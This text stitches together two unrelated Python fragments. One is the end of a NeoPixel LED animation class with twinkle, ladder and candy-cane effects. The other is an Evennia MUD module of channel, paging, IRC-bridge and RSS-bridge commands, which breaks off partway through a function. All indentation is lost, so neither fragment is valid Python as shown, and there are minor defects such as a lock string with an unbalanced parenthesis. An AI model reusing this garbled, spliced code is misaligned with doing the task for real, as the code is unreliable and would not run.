"""Wipes random colors from SUCCESS_COLORS up the array"""
wait_s = float(POLL_FREQUENCY / (LED_COUNT * 2.0))
hold = float(POLL_FREQUENCY * 0.5)
for i in range(0, LED_COUNT):
self.flash([i], getRandomColor(SUCCESS_COLORS), fade_in=(0.2*hold), hold=(0.6*hold), fade_out=(0.2*hold))
time.sleep(wait_s)
def solidColorTwinkle(self):
"""Twinkles the whole strip, all the same random color from SUCCESS_COLORS"""
color = getRandomColor(SUCCESS_COLORS)
wait_s = float(POLL_FREQUENCY) / LED_COUNT
hold = min(wait_s, 1.0)
addrs = random.sample(range(0, LED_COUNT), LED_COUNT) * 4
for i in range(0, LED_COUNT):
if (((i+1)*hold)+0.5) <= POLL_FREQUENCY: # SO led don't overextend
self.flash(addrs[(4 * i):(4 * i) + 4], color, hold=hold)
time.sleep(wait_s)
def whiteTwinkle(self):
"""Twinkles the whole strip white"""
wait_s = float(POLL_FREQUENCY) / LED_COUNT
hold = min(wait_s, 1.0)
addrs = random.sample(range(0, LED_COUNT), LED_COUNT) * 4
for i in range(0, LED_COUNT):
if (((i+1)*hold)+0.5) <= POLL_FREQUENCY: # SO led don't overextend
self.flash(addrs[(4 * i):(4 * i) + 4], (255, 255, 255), hold=hold)
time.sleep(wait_s)
def randomColorTwinkle(self):
"""Twinkles the whole strip, each pixel a random color from SUCCESS_COLORS"""
wait_s = float(POLL_FREQUENCY) / LED_COUNT
hold = min(wait_s, 1.0)
addrs = random.sample(range(0, LED_COUNT), LED_COUNT) * 4
for i in range(0, LED_COUNT):
if (((i+1)*hold)+0.5) <= POLL_FREQUENCY: # SO led don't overextend
self.flash(addrs[(4 * i):(4 * i) + 4], getRandomColor(SUCCESS_COLORS), hold=hold)
time.sleep(wait_s)
def solidColorGlow(self, intensity):
"""Turns whole strip on at <intensity> brightness, all the same random color from SUCCESS_COLORS"""
color = getDimmedRGB(getRandomColor(SUCCESS_COLORS), intensity)
self.flash(range(0,LED_COUNT), color, fade_in=(0.2*POLL_FREQUENCY), hold=(0.6*POLL_FREQUENCY), fade_out=(0.2*POLL_FREQUENCY))
def randomColorGlow(self, intensity):
"""Turns whole strip on at <intensity> brightness, each pixel a random color from SUCCESS_COLORS"""
for led in range(0, LED_COUNT):
color = getDimmedRGB(getRandomColor(SUCCESS_COLORS), intensity)
self.flash([led], color, fade_in=(0.2*POLL_FREQUENCY), hold=(0.6*POLL_FREQUENCY), fade_out=(0.2*POLL_FREQUENCY))
def solidColorLadder(self):
"""Flashes a random color from SUCCESS_COLORS up the array, stepping up regular intervals"""
color = getRandomColor(SUCCESS_COLORS)
ledList = [l for l in range(0, LED_COUNT-int(POLL_FREQUENCY)+1) if (l % int(POLL_FREQUENCY) == 0)]
for i in range(0, int(POLL_FREQUENCY)):
for addr in ledList:
self.flash([addr+i], color, hold=0.5)
time.sleep(1)
def randomColorLadder(self):
"""Flashes random colors from SUCCESS_COLORS up the array, stepping up regular intervals"""
ledList = [l for l in range(0, LED_COUNT-int(POLL_FREQUENCY)+1) if (l % int(POLL_FREQUENCY) == 0)]
for i in range(0, int(POLL_FREQUENCY)):
for addr in ledList:
self.flash([addr+i], getRandomColor(SUCCESS_COLORS), hold=0.5)
time.sleep(1)
def candyCane(self):
"""Pushes red and white stripes up the array"""
color_div = int(LED_COUNT / 5)
color = (255, 0, 0)
wait_s = float(POLL_FREQUENCY / (LED_COUNT * 2.0))
hold = float(POLL_FREQUENCY * 0.5)
for i in range(0, LED_COUNT):
if (i % color_div) == 0:
if color == (255, 0, 0):
color = (255, 255, 255)
else:
color = (255, 0, 0)
self.flash([i], color, fade_in=(0.2*hold), hold=(0.6*hold), fade_out=(0.2*hold))
time.sleep(wait_s)
## ---- Pixel Threads ----------------------------------------------------------------------------------------------
def flash(self, addrs, color, fade_in=0.25, hold=0.0, fade_out=0.25):
"""Wrapper for Flash thread handler"""
threading.Thread(target=self.flashThread, args=(addrs, color, fade_in, hold, fade_out,)).start()
def flashThread(self, addrs, color, fade_in=0.25, hold=0.0, fade_out=0.25):
"""Flashes all pixels in <addrs> with <color>, run as a thread"""
# fade in period
wait_s = (fade_in / LED_FADE_STEP)
alpha_mult = (255.0 / LED_FADE_STEP)
for i in range(0, LED_FADE_STEP):
for pixel in addrs:
c = getDimmedRGB(color, alpha=((i+1)*alpha_mult))
self.strip.setPixelColorRGB(pixel, *c)
time.sleep(wait_s)
if hold > 0:
time.sleep(hold)
# fade out period
wait_s = (fade_out / LED_FADE_STEP)
for i in range(LED_FADE_STEP, 0, -1):
for pixel in addrs:
c = getDimmedRGB(color, alpha=((i-1)*alpha_mult))
self.strip.setPixelColorRGB(pixel, *c)
time.sleep(wait_s)
def refreshStrip(self, update_sleep):
"""LED_UPDATE_FREQ times per second the colors are sent to the NeoPixel Hardware Array"""
while self.isAlive:
self.strip.show()
time.sleep(update_sleep)
# Make sure to turn them off at the end
for i in range(0, LED_COUNT):
self.strip.setPixelColorRGB(i, 0, 0, 0)
self.strip.show()
| |
"""
Comsystem command module.
Comm commands are OOC commands and intended to be made available to
the Account at all times (they go into the AccountCmdSet). So we
make sure to homogenize self.caller to always be the account object
for easy handling.
"""
from past.builtins import cmp
from django.conf import settings
from evennia.comms.models import ChannelDB, Msg
from evennia.accounts.models import AccountDB
from evennia.accounts import bots
from evennia.comms.channelhandler import CHANNELHANDLER
from evennia.locks.lockhandler import LockException
from evennia.utils import create, utils, evtable
from evennia.utils.utils import make_iter, class_from_module
COMMAND_DEFAULT_CLASS = class_from_module(settings.COMMAND_DEFAULT_CLASS)
# limit symbol import for API
__all__ = ("CmdAddCom", "CmdDelCom", "CmdAllCom",
"CmdChannels", "CmdCdestroy", "CmdCBoot", "CmdCemit",
"CmdCWho", "CmdChannelCreate", "CmdClock", "CmdCdesc",
"CmdPage", "CmdIRC2Chan", "CmdRSS2Chan")
_DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH
def find_channel(caller, channelname, silent=False, noaliases=False):
"""
Helper function for searching for a single channel with
some error handling.
"""
channels = ChannelDB.objects.channel_search(channelname)
if not channels:
if not noaliases:
channels = [chan for chan in ChannelDB.objects.get_all_channels()
if channelname in chan.aliases.all()]
if channels:
return channels[0]
if not silent:
caller.msg("Channel '%s' not found." % channelname)
return None
elif len(channels) > 1:
matches = ", ".join(["%s(%s)" % (chan.key, chan.id) for chan in channels])
if not silent:
caller.msg("Multiple channels match (be more specific): \n%s" % matches)
return None
return channels[0]
class CmdAddCom(COMMAND_DEFAULT_CLASS):
"""
add a channel alias and/or subscribe to a channel
Usage:
addcom [alias=] <channel>
Joins a given channel. If alias is given, this will allow you to
refer to the channel by this alias rather than the full channel
name. Subsequent calls of this command can be used to add multiple
aliases to an already joined channel.
"""
key = "addcom"
aliases = ["aliaschan", "chanalias"]
help_category = "Comms"
locks = "cmd:not pperm(channel_banned)"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Implement the command"""
caller = self.caller
args = self.args
account = caller
if not args:
self.msg("Usage: addcom [alias =] channelname.")
return
if self.rhs:
# rhs holds the channelname
channelname = self.rhs
alias = self.lhs
else:
channelname = self.args
alias = None
channel = find_channel(caller, channelname)
if not channel:
# we use the custom search method to handle errors.
return
# check permissions
if not channel.access(account, 'listen'):
self.msg("%s: You are not allowed to listen to this channel." % channel.key)
return
string = ""
if not channel.has_connection(account):
# we want to connect as well.
if not channel.connect(account):
# if this would have returned True, the account is connected
self.msg("%s: You are not allowed to join this channel." % channel.key)
return
else:
string += "You now listen to the channel %s. " % channel.key
else:
if channel.unmute(account):
string += "You unmute channel %s." % channel.key
else:
string += "You are already connected to channel %s." % channel.key
if alias:
# create a nick and add it to the caller.
caller.nicks.add(alias, channel.key, category="channel")
string += " You can now refer to the channel %s with the alias '%s'."
self.msg(string % (channel.key, alias))
else:
string += " No alias added."
self.msg(string)
class CmdDelCom(COMMAND_DEFAULT_CLASS):
"""
remove a channel alias and/or unsubscribe from channel
Usage:
delcom <alias or channel>
delcom/all <channel>
If the full channel name is given, unsubscribe from the
channel. If an alias is given, remove the alias but don't
unsubscribe. If the 'all' switch is used, remove all aliases
for that channel.
"""
key = "delcom"
aliases = ["delaliaschan", "delchanalias"]
help_category = "Comms"
locks = "cmd:not perm(channel_banned)"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Implementing the command. """
caller = self.caller
account = caller
if not self.args:
self.msg("Usage: delcom <alias or channel>")
return
ostring = self.args.lower()
channel = find_channel(caller, ostring, silent=True, noaliases=True)
if channel:
# we have given a channel name - unsubscribe
if not channel.has_connection(account):
self.msg("You are not listening to that channel.")
return
chkey = channel.key.lower()
delnicks = "all" in self.switches
# find all nicks linked to this channel and delete them
if delnicks:
for nick in [nick for nick in make_iter(caller.nicks.get(category="channel", return_obj=True))
if nick and nick.pk and nick.value[3].lower() == chkey]:
nick.delete()
disconnect = channel.disconnect(account)
if disconnect:
wipednicks = " Eventual aliases were removed." if delnicks else ""
self.msg("You stop listening to channel '%s'.%s" % (channel.key, wipednicks))
return
else:
# we are removing a channel nick
channame = caller.nicks.get(key=ostring, category="channel")
channel = find_channel(caller, channame, silent=True)
if not channel:
self.msg("No channel with alias '%s' was found." % ostring)
else:
if caller.nicks.get(ostring, category="channel"):
caller.nicks.remove(ostring, category="channel")
self.msg("Your alias '%s' for channel %s was cleared." % (ostring, channel.key))
else:
self.msg("You had no such alias defined for this channel.")
class CmdAllCom(COMMAND_DEFAULT_CLASS):
"""
perform admin operations on all channels
Usage:
allcom [on | off | who | destroy]
Allows the user to universally turn off or on all channels they are on,
as well as perform a 'who' for all channels they are on. Destroy deletes
all channels that you control.
Without argument, works like comlist.
"""
key = "allcom"
locks = "cmd: not pperm(channel_banned)"
help_category = "Comms"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Runs the function"""
caller = self.caller
args = self.args
if not args:
self.execute_cmd("@channels")
self.msg("(Usage: allcom on | off | who | destroy)")
return
if args == "on":
# get names of all channels available to listen to
# and activate them all
channels = [chan for chan in ChannelDB.objects.get_all_channels()
if chan.access(caller, 'listen')]
for channel in channels:
self.execute_cmd("addcom %s" % channel.key)
elif args == "off":
# get names all subscribed channels and disconnect from them all
channels = ChannelDB.objects.get_subscriptions(caller)
for channel in channels:
self.execute_cmd("delcom %s" % channel.key)
elif args == "destroy":
# destroy all channels you control
channels = [chan for chan in ChannelDB.objects.get_all_channels()
if chan.access(caller, 'control')]
for channel in channels:
self.execute_cmd("@cdestroy %s" % channel.key)
elif args == "who":
# run a who, listing the subscribers on visible channels.
string = "\n|CChannel subscriptions|n"
channels = [chan for chan in ChannelDB.objects.get_all_channels()
if chan.access(caller, 'listen')]
if not channels:
string += "No channels."
for channel in channels:
string += "\n|w%s:|n\n %s" % (channel.key, channel.wholist)
self.msg(string.strip())
else:
# wrong input
self.msg("Usage: allcom on | off | who | clear")
class CmdChannels(COMMAND_DEFAULT_CLASS):
"""
list all channels available to you
Usage:
@channels
@clist
comlist
Lists all channels available to you, whether you listen to them or not.
Use 'comlist' to only view your current channel subscriptions.
Use addcom/delcom to join and leave channels
"""
key = "@channels"
aliases = ["@clist", "comlist", "chanlist", "channellist", "all channels"]
help_category = "Comms"
locks = "cmd: not pperm(channel_banned)"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Implement function"""
caller = self.caller
# all channels we have available to listen to
channels = [chan for chan in ChannelDB.objects.get_all_channels()
if chan.access(caller, 'listen')]
if not channels:
self.msg("No channels available.")
return
# all channel we are already subscribed to
subs = ChannelDB.objects.get_subscriptions(caller)
if self.cmdstring == "comlist":
# just display the subscribed channels with no extra info
comtable = evtable.EvTable("|wchannel|n", "|wmy aliases|n",
"|wdescription|n", align="l", maxwidth=_DEFAULT_WIDTH)
for chan in subs:
clower = chan.key.lower()
nicks = caller.nicks.get(category="channel", return_obj=True)
comtable.add_row(*["%s%s" % (chan.key, chan.aliases.all() and
"(%s)" % ",".join(chan.aliases.all()) or ""),
"%s" % ",".join(nick.db_key for nick in make_iter(nicks)
if nick and nick.value[3].lower() == clower),
chan.db.desc])
self.msg("\n|wChannel subscriptions|n (use |w@channels|n to list all,"
" |waddcom|n/|wdelcom|n to sub/unsub):|n\n%s" % comtable)
else:
# full listing (of channels caller is able to listen to)
comtable = evtable.EvTable("|wsub|n", "|wchannel|n", "|wmy aliases|n",
"|wlocks|n", "|wdescription|n", maxwidth=_DEFAULT_WIDTH)
for chan in channels:
clower = chan.key.lower()
nicks = caller.nicks.get(category="channel", return_obj=True)
nicks = nicks or []
if chan not in subs:
substatus = "|rNo|n"
elif caller in chan.mutelist:
substatus = "|rMuted|n"
else:
substatus = "|gYes|n"
comtable.add_row(*[substatus,
"%s%s" % (chan.key, chan.aliases.all() and
"(%s)" % ",".join(chan.aliases.all()) or ""),
"%s" % ",".join(nick.db_key for nick in make_iter(nicks)
if nick.value[3].lower() == clower),
str(chan.locks),
chan.db.desc])
comtable.reformat_column(0, width=9)
comtable.reformat_column(3, width=14)
self.msg("\n|wAvailable channels|n (use |wcomlist|n,|waddcom|n and |wdelcom|n"
" to manage subscriptions):\n%s" % comtable)
class CmdCdestroy(COMMAND_DEFAULT_CLASS):
"""
destroy a channel you created
Usage:
@cdestroy <channel>
Destroys a channel that you control.
"""
key = "@cdestroy"
help_category = "Comms"
locks = "cmd: not pperm(channel_banned)"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Destroy objects cleanly."""
caller = self.caller
if not self.args:
self.msg("Usage: @cdestroy <channelname>")
return
channel = find_channel(caller, self.args)
if not channel:
self.msg("Could not find channel %s." % self.args)
return
if not channel.access(caller, 'control'):
self.msg("You are not allowed to do that.")
return
channel_key = channel.key
message = "%s is being destroyed. Make sure to change your aliases." % channel_key
msgobj = create.create_message(caller, message, channel)
channel.msg(msgobj)
channel.delete()
CHANNELHANDLER.update()
self.msg("Channel '%s' was destroyed." % channel_key)
class CmdCBoot(COMMAND_DEFAULT_CLASS):
"""
kick an account from a channel you control
Usage:
@cboot[/quiet] <channel> = <account> [:reason]
Switches:
quiet - don't notify the channel
Kicks an account or object from a channel you control.
"""
key = "@cboot"
locks = "cmd: not pperm(channel_banned)"
help_category = "Comms"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""implement the function"""
if not self.args or not self.rhs:
string = "Usage: @cboot[/quiet] <channel> = <account> [:reason]"
self.msg(string)
return
channel = find_channel(self.caller, self.lhs)
if not channel:
return
reason = ""
if ":" in self.rhs:
accountname, reason = self.rhs.rsplit(":", 1)
searchstring = accountname.lstrip('*')
else:
searchstring = self.rhs.lstrip('*')
account = self.caller.search(searchstring, account=True)
if not account:
return
if reason:
reason = " (reason: %s)" % reason
if not channel.access(self.caller, "control"):
string = "You don't control this channel."
self.msg(string)
return
if account not in channel.db_subscriptions.all():
string = "Account %s is not connected to channel %s." % (account.key, channel.key)
self.msg(string)
return
if "quiet" not in self.switches:
string = "%s boots %s from channel.%s" % (self.caller, account.key, reason)
channel.msg(string)
# find all account's nicks linked to this channel and delete them
for nick in [nick for nick in
account.character.nicks.get(category="channel") or []
if nick.value[3].lower() == channel.key]:
nick.delete()
# disconnect account
channel.disconnect(account)
CHANNELHANDLER.update()
class CmdCemit(COMMAND_DEFAULT_CLASS):
"""
send an admin message to a channel you control
Usage:
@cemit[/switches] <channel> = <message>
Switches:
sendername - attach the sender's name before the message
quiet - don't echo the message back to sender
Allows the user to broadcast a message over a channel as long as
they control it. It does not show the user's name unless they
provide the /sendername switch.
"""
key = "@cemit"
aliases = ["@cmsg"]
locks = "cmd: not pperm(channel_banned) and pperm(Player)"
help_category = "Comms"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Implement function"""
if not self.args or not self.rhs:
string = "Usage: @cemit[/switches] <channel> = <message>"
self.msg(string)
return
channel = find_channel(self.caller, self.lhs)
if not channel:
return
if not channel.access(self.caller, "control"):
string = "You don't control this channel."
self.msg(string)
return
message = self.rhs
if "sendername" in self.switches:
message = "%s: %s" % (self.caller.key, message)
channel.msg(message)
if "quiet" not in self.switches:
string = "Sent to channel %s: %s" % (channel.key, message)
self.msg(string)
class CmdCWho(COMMAND_DEFAULT_CLASS):
"""
show who is listening to a channel
Usage:
@cwho <channel>
List who is connected to a given channel you have access to.
"""
key = "@cwho"
locks = "cmd: not pperm(channel_banned)"
help_category = "Comms"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""implement function"""
if not self.args:
string = "Usage: @cwho <channel>"
self.msg(string)
return
channel = find_channel(self.caller, self.lhs)
if not channel:
return
if not channel.access(self.caller, "listen"):
string = "You can't access this channel."
self.msg(string)
return
string = "\n|CChannel subscriptions|n"
string += "\n|w%s:|n\n %s" % (channel.key, channel.wholist)
self.msg(string.strip())
class CmdChannelCreate(COMMAND_DEFAULT_CLASS):
"""
create a new channel
Usage:
@ccreate <new channel>[;alias;alias...] = description
Creates a new channel owned by you.
"""
key = "@ccreate"
aliases = "channelcreate"
locks = "cmd:not pperm(channel_banned) and pperm(Player)"
help_category = "Comms"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Implement the command"""
caller = self.caller
if not self.args:
self.msg("Usage @ccreate <channelname>[;alias;alias..] = description")
return
description = ""
if self.rhs:
description = self.rhs
lhs = self.lhs
channame = lhs
aliases = None
if ';' in lhs:
channame, aliases = lhs.split(';', 1)
aliases = [alias.strip().lower() for alias in aliases.split(';')]
channel = ChannelDB.objects.channel_search(channame)
if channel:
self.msg("A channel with that name already exists.")
return
# Create and set the channel up
lockstring = "send:all();listen:all();control:id(%s)" % caller.id
new_chan = create.create_channel(channame.strip(),
aliases,
description,
locks=lockstring)
new_chan.connect(caller)
CHANNELHANDLER.update()
self.msg("Created channel %s and connected to it." % new_chan.key)
class CmdClock(COMMAND_DEFAULT_CLASS):
"""
change channel locks of a channel you control
Usage:
@clock <channel> [= <lockstring>]
Changes the lock access restrictions of a channel. If no
lockstring was given, view the current lock definitions.
"""
key = "@clock"
locks = "cmd:not pperm(channel_banned)"
aliases = ["@clock"]
help_category = "Comms"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""run the function"""
if not self.args:
string = "Usage: @clock channel [= lockstring]"
self.msg(string)
return
channel = find_channel(self.caller, self.lhs)
if not channel:
return
if not self.rhs:
# no =, so just view the current locks
string = "Current locks on %s:" % channel.key
string = "%s\n %s" % (string, channel.locks)
self.msg(string)
return
# we want to add/change a lock.
if not channel.access(self.caller, "control"):
string = "You don't control this channel."
self.msg(string)
return
# Try to add the lock
try:
channel.locks.add(self.rhs)
except LockException as err:
self.msg(err)
return
string = "Lock(s) applied. "
string += "Current locks on %s:" % channel.key
string = "%s\n %s" % (string, channel.locks)
self.msg(string)
class CmdCdesc(COMMAND_DEFAULT_CLASS):
"""
describe a channel you control
Usage:
@cdesc <channel> = <description>
Changes the description of the channel as shown in
channel lists.
"""
key = "@cdesc"
locks = "cmd:not pperm(channel_banned)"
help_category = "Comms"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Implement command"""
caller = self.caller
if not self.rhs:
self.msg("Usage: @cdesc <channel> = <description>")
return
channel = find_channel(caller, self.lhs)
if not channel:
self.msg("Channel '%s' not found." % self.lhs)
return
# check permissions
if not channel.access(caller, 'control'):
self.msg("You cannot admin this channel.")
return
# set the description
channel.db.desc = self.rhs
channel.save()
self.msg("Description of channel '%s' set to '%s'." % (channel.key,
self.rhs))
class CmdPage(COMMAND_DEFAULT_CLASS):
"""
send a private message to another account
Usage:
page[/switches] [<account>,<account>,... = <message>]
tell ''
page <number>
Switch:
last - shows who you last messaged
list - show your last <number> of tells/pages (default)
Send a message to target user (if online). If no
argument is given, you will get a list of your latest messages.
"""
key = "page"
aliases = ['tell']
locks = "cmd:not pperm(page_banned)"
help_category = "Comms"
# this is used by the COMMAND_DEFAULT_CLASS parent
account_caller = True
def func(self):
"""Implement function using the Msg methods"""
# Since account_caller is set above, this will be an Account.
caller = self.caller
# get the messages we've sent (not to channels)
pages_we_sent = Msg.objects.get_messages_by_sender(caller, exclude_channel_messages=True)
# get last messages we've got
pages_we_got = Msg.objects.get_messages_by_receiver(caller)
if 'last' in self.switches:
if pages_we_sent:
recv = ",".join(obj.key for obj in pages_we_sent[-1].receivers)
self.msg("You last paged |c%s|n:%s" % (recv, pages_we_sent[-1].message))
return
else:
self.msg("You haven't paged anyone yet.")
return
if not self.args or not self.rhs:
pages = pages_we_sent + pages_we_got
pages.sort(lambda x, y: cmp(x.date_created, y.date_created))
number = 5
if self.args:
try:
number = int(self.args)
except ValueError:
self.msg("Usage: tell [<account> = msg]")
return
if len(pages) > number:
lastpages = pages[-number:]
else:
lastpages = pages
template = "|w%s|n |c%s|n to |c%s|n: %s"
lastpages = "\n ".join(template %
(utils.datetime_format(page.date_created),
",".join(obj.key for obj in page.senders),
"|n,|c ".join([obj.name for obj in page.receivers]),
page.message) for page in lastpages)
if lastpages:
string = "Your latest pages:\n %s" % lastpages
else:
string = "You haven't paged anyone yet."
self.msg(string)
return
# We are sending. Build a list of targets
if not self.lhs:
# If there are no targets, then set the targets
# to the last person we paged.
if pages_we_sent:
receivers = pages_we_sent[-1].receivers
else:
self.msg("Who do you want to page?")
return
else:
receivers = self.lhslist
recobjs = []
for receiver in set(receivers):
if isinstance(receiver, basestring):
pobj = caller.search(receiver)
elif hasattr(receiver, 'character'):
pobj = receiver
else:
self.msg("Who do you want to page?")
return
if pobj:
recobjs.append(pobj)
if not recobjs:
self.msg("Noone found to page.")
return
header = "|wAccount|n |c%s|n |wpages:|n" % caller.key
message = self.rhs
# if message begins with a :, we assume it is a 'page-pose'
if message.startswith(":"):
message = "%s %s" % (caller.key, message.strip(':').strip())
# create the persistent message object
create.create_message(caller, message,
receivers=recobjs)
# tell the accounts they got a message.
received = []
rstrings = []
for pobj in recobjs:
if not pobj.access(caller, 'msg'):
rstrings.append("You are not allowed to page %s." % pobj)
continue
pobj.msg("%s %s" % (header, message))
if hasattr(pobj, 'sessions') and not pobj.sessions.count():
received.append("|C%s|n" % pobj.name)
rstrings.append("%s is offline. They will see your message if they list their pages later."
% received[-1])
else:
received.append("|c%s|n" % pobj.name)
if rstrings:
self.msg("\n".join(rstrings))
self.msg("You paged %s with: '%s'." % (", ".join(received), message))
def _list_bots():
"""
Helper function to produce a list of all IRC bots.
Returns:
bots (str): A table of bots or an error message.
"""
ircbots = [bot for bot in AccountDB.objects.filter(db_is_bot=True, username__startswith="ircbot-")]
if ircbots:
from evennia.utils.evtable import EvTable
table = EvTable("|w#dbref|n", "|wbotname|n", "|wev-channel|n",
"|wirc-channel|n", "|wSSL|n", maxwidth=_DEFAULT_WIDTH)
for ircbot in ircbots:
ircinfo = "%s (%s:%s)" % (ircbot.db.irc_channel, ircbot.db.irc_network, ircbot.db.irc_port)
table.add_row("#%i" % ircbot.id, ircbot.db.irc_botname, ircbot.db.ev_channel, ircinfo, ircbot.db.irc_ssl)
return table
else:
return "No irc bots found."
class CmdIRC2Chan(COMMAND_DEFAULT_CLASS):
"""
link an evennia channel to an external IRC channel
Usage:
@irc2chan[/switches] <evennia_channel> = <ircnetwork> <port> <#irchannel> <botname>[:typeclass]
@irc2chan/delete botname|#dbid
Switches:
/delete - this will delete the bot and remove the irc connection
to the channel. Requires the botname or #dbid as input.
/remove - alias to /delete
/disconnect - alias to /delete
/list - show all irc<->evennia mappings
/ssl - use an SSL-encrypted connection
Example:
@irc2chan myircchan = irc.dalnet.net 6667 #mychannel evennia-bot
@irc2chan public = irc.freenode.net 6667 #evgaming #evbot:accounts.mybot.MyBot
This creates an IRC bot that connects to a given IRC network and
channel. If a custom typeclass path is given, this will be used
instead of the default bot class.
The bot will relay everything said in the evennia channel to the
IRC channel and vice versa. The bot will automatically connect at
server start, so this command need only be given once. The
/disconnect switch will permanently delete the bot. To only
temporarily deactivate it, use the |w@services|n command instead.
Provide an optional bot class path to use a custom bot.
"""
key = "@irc2chan"
locks = "cmd:serversetting(IRC_ENABLED) and pperm(Developer)"
help_category = "Comms"
def func(self):
"""Setup the irc-channel mapping"""
if not settings.IRC_ENABLED:
string = """IRC is not enabled. You need to activate it in game/settings.py."""
self.msg(string)
return
if 'list' in self.switches:
# show all connections
self.msg(_list_bots())
return
if 'disconnect' in self.switches or 'remove' in self.switches or 'delete' in self.switches:
botname = "ircbot-%s" % self.lhs
matches = AccountDB.objects.filter(db_is_bot=True, username=botname)
dbref = utils.dbref(self.lhs)
if not matches and dbref:
# try dbref match
matches = AccountDB.objects.filter(db_is_bot=True, id=dbref)
if matches:
matches[0].delete()
self.msg("IRC connection destroyed.")
else:
self.msg("IRC connection/bot could not be removed, does it exist?")
return
if not self.args or not self.rhs:
string = "Usage: @irc2chan[/switches] <evennia_channel> =" \
" <ircnetwork> <port> <#irchannel> <botname>[:typeclass]"
self.msg(string)
return
channel = self.lhs
self.rhs = self.rhs.replace('#', ' ') # to avoid Python comment issues
try:
irc_network, irc_port, irc_channel, irc_botname = \
[part.strip() for part in self.rhs.split(None, 4)]
irc_channel = "#%s" % irc_channel
except Exception:
string = "IRC bot definition '%s' is not valid." % self.rhs
self.msg(string)
return
botclass = None
if ":" in irc_botname:
irc_botname, botclass = [part.strip() for part in irc_botname.split(":", 2)]
botname = "ircbot-%s" % irc_botname
# If path given, use custom bot otherwise use default.
botclass = botclass if botclass else bots.IRCBot
irc_ssl = "ssl" in self.switches
# create a new bot
bot = AccountDB.objects.filter(username__iexact=botname)
if bot:
# re-use an existing bot
bot = bot[0]
if not bot.is_bot:
self.msg("Account '%s' already exists and is not a bot." % botname)
return
else:
try:
bot = create.create_account(botname, None, None, typeclass=botclass)
except Exception as err:
self.msg("|rError, could not create the bot:|n '%s'." % err)
return
bot.start(ev_channel=channel, irc_botname=irc_botname, irc_channel=irc_channel,
irc_network=irc_network, irc_port=irc_port, irc_ssl=irc_ssl)
self.msg("Connection created. Starting IRC bot.")
class CmdIRCStatus(COMMAND_DEFAULT_CLASS):
"""
Check and reboot IRC bot.
Usage:
ircstatus [#dbref ping||nicklist||reconnect]
If not given arguments, will return a list of all bots (like
@irc2chan/list). The 'ping' argument will ping the IRC network to
see if the connection is still responsive. The 'nicklist' argument
(aliases are 'who' and 'users') will return a list of users on the
remote IRC channel. Finally, 'reconnect' will force the client to
disconnect and reconnect again. This may be a last resort if the
client has silently lost connection (this may happen if the remote
network experience network issues). During the reconnection
messages sent to either channel will be lost.
"""
key = "@ircstatus"
locks = "cmd:serversetting(IRC_ENABLED) and perm(ircstatus) or perm(Builder))"
help_category = "Comms"
def func(self):
"""Handles the functioning of the command."""
if not self.args:
self.msg(_list_bots())
return
# should always be on the form botname option
args = self.args.split()
if len(args) != 2:
self.msg("Usage: @ircstatus [#dbref ping||nicklist||reconnect]")
return
botname, option = args
if option not in ("ping", "users", "reconnect", "nicklist", "who"):
self.msg("Not a valid option.")
return
matches = None
if utils.dbref(botname):
matches = AccountDB.objects.filter(db_is_bot=True, id=utils.dbref(botname))
if not matches:
self.msg("No matching IRC-bot found. Use @ircstatus without arguments to list active bots.")
return
ircbot = matches[0]
channel = ircbot.db.irc_channel
network = ircbot.db.irc_network
port = ircbot.db.irc_port
chtext = "IRC bot '%s' on channel %s (%s:%s)" % (ircbot.db.irc_botname, channel, network, port)
if option == "ping":
# check connection by sending outself a ping through the server.
self.caller.msg("Pinging through %s." % chtext)
ircbot.ping(self.caller)
elif option in ("users", "nicklist", "who"):
# retrieve user list. The bot must handles the echo since it's
# an asynchronous call.
self.caller.msg("Requesting nicklist from %s (%s:%s)." % (channel, network, port))
ircbot.get_nicklist(self.caller)
elif self.caller.locks.check_lockstring(self.caller, "dummy:perm(ircstatus) or perm(Developer)"):
# reboot the client
self.caller.msg("Forcing a disconnect + reconnect of %s." % chtext)
ircbot.reconnect()
else:
self.caller.msg("You don't have permission to force-reload the IRC bot.")
# RSS connection
class CmdRSS2Chan(COMMAND_DEFAULT_CLASS):
"""
link an evennia channel to an external RSS feed
Usage:
@rss2chan[/switches] <evennia_channel> = <rss_url>
Switches:
/disconnect - this will stop the feed and remove the connection to the
channel.
/remove - "
/list - show all rss->evennia mappings
Example:
@rss2chan rsschan = http://code.google.com/feeds/p/evennia/updates/basic
This creates an RSS reader that connects to a given RSS feed url. Updates
will be echoed as a title and news link to the given channel. The rate of
updating is set with the RSS_UPDATE_INTERVAL variable in settings (default
is every 10 minutes).
When disconnecting you need to supply both the channel and url again so as
to identify the connection uniquely.
"""
key = "@rss2chan"
locks = "cmd:serversetting(RSS_ENABLED) and pperm(Developer)"
help_category = "Comms"
def func(self):
"""Setup the rss-channel mapping"""
# checking we have all we need
if not settings.RSS_ENABLED:
string = """RSS is not enabled. You need to activate it in game/settings.py."""
self.msg(string)
return
try:
import feedparser
assert feedparser # to avoid checker error of not being used
except ImportError:
string = "RSS requires python-feedparser (https://pypi.python.org/pypi/feedparser)." \
" Install before continuing."
self.msg(string)
return
if 'list' in self.switches:
# show all connections
rssbots = [bot for bot in AccountDB.objects.filter(db_is_bot=True, username__startswith="rssbot-")]
if rssbots:
from evennia.utils.evtable import EvTable
table = EvTable("|wdbid|n", "|wupdate rate|n", "|wev-channel",
"|wRSS feed URL|n", border="cells", maxwidth=_DEFAULT_WIDTH)
for rssbot in rssbots:
table.add_row(rssbot.id, rssbot.db.rss_rate, rssbot.db.ev_channel, rssbot.db.rss_url)
self.msg(table)
else:
self.msg("No rss bots found.")
return
if 'disconnect' in self.switches or 'remove' in self.switches or 'delete' in self.switches:
botname = "rssbot-%s" % self.lhs
